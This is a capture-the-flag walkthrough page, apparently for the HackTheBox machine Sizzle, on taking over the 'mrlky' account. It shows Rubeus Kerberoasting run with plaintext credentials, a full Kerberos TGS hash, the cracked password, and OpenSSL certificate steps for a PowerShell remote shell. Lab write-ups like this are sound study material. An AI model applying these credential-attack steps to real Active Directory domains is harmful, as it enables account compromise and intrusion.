CTFLover hack stuff | CTF solutions

30-Getting-mrlky

PS htb\amanda@SIZZLE Users> netstat -ap tcp                                                                                   
Enter PEM pass phrase:                                                                                                        
Active Connections                                                                                                            
  Proto  Local Address          Foreign Address        State                                                                  
  TCP    0.0.0.0:21             sizzle:0               LISTENING
  TCP    0.0.0.0:80             sizzle:0               LISTENING
  TCP    0.0.0.0:88             sizzle:0               LISTENING
  TCP    0.0.0.0:135            sizzle:0               LISTENING
  TCP    0.0.0.0:389            sizzle:0               LISTENING

port 88 is on but in my nmap scan i was not able to see it. Must be firewall or something.

Kerberoasting
...

We can't directly access port 88 from our machine so i can use port forwarding or i can use rubeus.exe to it.

I ll transfer rubeus.exe to the target and execute it there.

PS htb\amanda@SIZZLE temp> . ./rubeus.exe kerberoast /creduser:htb.local\amanda /credpassword:Ashare1972                      
Enter PEM pass phrase:                                                                                                        
                                                                                                                              
   ______        _                                                                                                            
  (_____ \      | |                                                                                                                                                                          
   _____) )_   _| |__  _____ _   _  ___                                                                                       
  |  __  /| | | |  _ \| ___ | | | |/___)                                                                                      
  | |  \ \| |_| | |_) ) ____| |_| |___ |                                                                                      
  |_|   |_|____/|____/|_____)____/(___/                                                                                                                                                                           
                                                                                                                                       
  v2.2.0                                                                                                                               
                                                                                                                                                                                                                                            
                                                                                                                                                 
[*] Action: Kerberoasting                                                                                                                        
                                                                                                                                                             
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.                                                                                                           
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.                                                                                                                 
                                                                                                                                                                                             
[*] Target Domain          : HTB.LOCAL                                                                                                                                                       
[*] Searching path 'LDAP://sizzle.HTB.LOCAL/DC=HTB,DC=LOCAL' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'                                                                             
                                                                                                                                                                                             
[*] Total kerberoastable users : 1                                                                                                                                                                                
                                                                                                                                                                                                                  
                                                                                                                                                                                                                                            
[*] SamAccountName         : mrlky                                                                                                                                                                                                          
[*] DistinguishedName      : CN=mrlky,CN=Users,DC=HTB,DC=LOCAL                                                                         
[*] ServicePrincipalName   : http/sizzle                           
[*] PwdLastSet             : 7/10/2018 2:08:09 PM                  
[*] Supported ETypes       : RC4_HMAC_DEFAULT                      
[*] Hash                   : $krb5tgs$23$*mrlky$HTB.LOCAL$http/sizzle@HTB.LOCAL*$C778EF9C8E3ED29E0BF9654A9D99                          
                             A04D$D3B85BE0592E195034F721E93B0E929390592D70CA3575D31A163037F223CB0AA068659A699                          
                             D316A62B24C52411C88D09BDD68C151B7DF4F6BEE0DEC6EB62CF35D5B102226037EA5E6CF361F677                          
                             69E3D16ACF34235D585250A169F8F54E4B3BC2F7275028531AAE00DDA7DA13EA804368A799333FFC                          
                             9F55115A6429FCCB838D52DE0D9316B160F677369D6EF05B79BD05C22D537B60202A3F2F0C60013A                          
                             B9A1E9BE3FBEA4AF86A1F2313EFF8C647B2021B09F2EDB4A3BF8597EF3FCFA92C9EA1AE9278CB716                          
                             9365019B609B3BBD485A7E0345FE60A726837DE08D8327749E85BE9EBC20A50815EC0339BE7DA260                          
                             E0919F3E190FDFB57074F13E5B5EBAB9901B79C43E2B0DBF7CA7DA4490A3E3254B2FE0EB145A701A                          
                             B464B97A6984F252BE28C843CCAC3932C9DC8B1DE96B646C99064B4635F9BBE00223B1CF061BE3D2                          
                             310AD575515BA2A2DA9AFCE0BF17DED50C4EBA514AFC84777DF8AB7B80A647D56FC4A822660BE991                          
                             5A87F3ADA80CD180D0C3EE1249E8A79169F3C3DC0EE346CFD446CCAE5625BDC903BF10F9D460D28C                          
                             153968B6ED3E7C6F493D9FFFD41AB03B8B4FE4FCC14132468263D4598231943AD4EF30E2A78AC65D                          
                             5E645FEE4E4E2711D0F811014B319AD83A4E185147AFF953CEA8167D01181EB386755B48AED13ADC                          
                             53106BA32B83E216C11A0111B475C72E4C0307554C68336C0B07A039E503CC0534E35685A2CB5001                          
                             7EDBE1F737793CC930B0A9621CF33775FCE9D21FC5CEADCF08BA15796D79EC1B93E5214EBFE6594C                          
                             6BBBA8FB269C0BA6E0BB730343F48C40EB0493C686018E41D24A3E2ACE4DB1CEC5CE76E8B196ACAE                          
                             8407D1431361FC1BA407D08A952CC15039F116D5CA4CF90A0001BBF21A19B6371853F2FA6AD6AB9D                          
                             E8FD61E00159CA960411C9E70908B4190B79DDCE1A28D375C599EB123E8046EA523F7552E109C870                          
                             74556646C7A315C2ACA9F40EC7EA4C3B773BA7888F8F475362EDAEEB3E2FAAE1D590E9CF0B0938EF                          
                             973D28974287DC1946E39B843821B08D233BF4AA44DCC880DDD573891BA4AB9D5F0F4632ABC150DE                          
                             E427F56C2B3F81A5849A7AFCAFA85C487DF23A1900EF3F3CD6F48F4AC6AF383828B3817ABDC32E94                          
                             5EFDE2A704EEA28CD9D8FF2E3DB4DE697B1B82CAA9935705EF04F652EBC022B44122D6C9F30636C5                          
                             D452086FA4AAF50268C28EB46DCAA0337B8785B0AD2B63601EF44F2C64A3F8901BDA7C143009FF66                          
                             934B528C277C4984B3DF39EA2B2C9AE1BE2EE8D6AD0FBF154528F20E9F6C51BA18D916A2C87D14AC                          
                             6F34F71C1CB8D85B96666153E2941BE849D7638C2E0B0ED354568CE29B4C626381CCD4A8830ECAFD                          
                             18F18BC689E2E7AB8

Made the hash on one line using vim and cracked it.
Pasted image 20240115111048.png

mrlky:Football#7

Now to get a shell i need to again create certificate just like we did for amanda.. login to the web server with mrlky user's creds

openssl genrsa -aes256 -out mrlky.key 2048
openssl req -new -key mrlky.key -out mrlky.csr

verify the csr file with the webserver just like in 20-GetAmanda > Certificate

➜  certificates ruby psRemoteMrlky.rb 
Enter PEM pass phrase:
PS htb\mrlky@SIZZLE Documents> dir
Enter PEM pass phrase:
PS htb\mrlky@SIZZLE Documents> whoami
htb\mrlky
PS htb\mrlky@SIZZLE Documents>

Kerberoasting...

Kerberoasting
...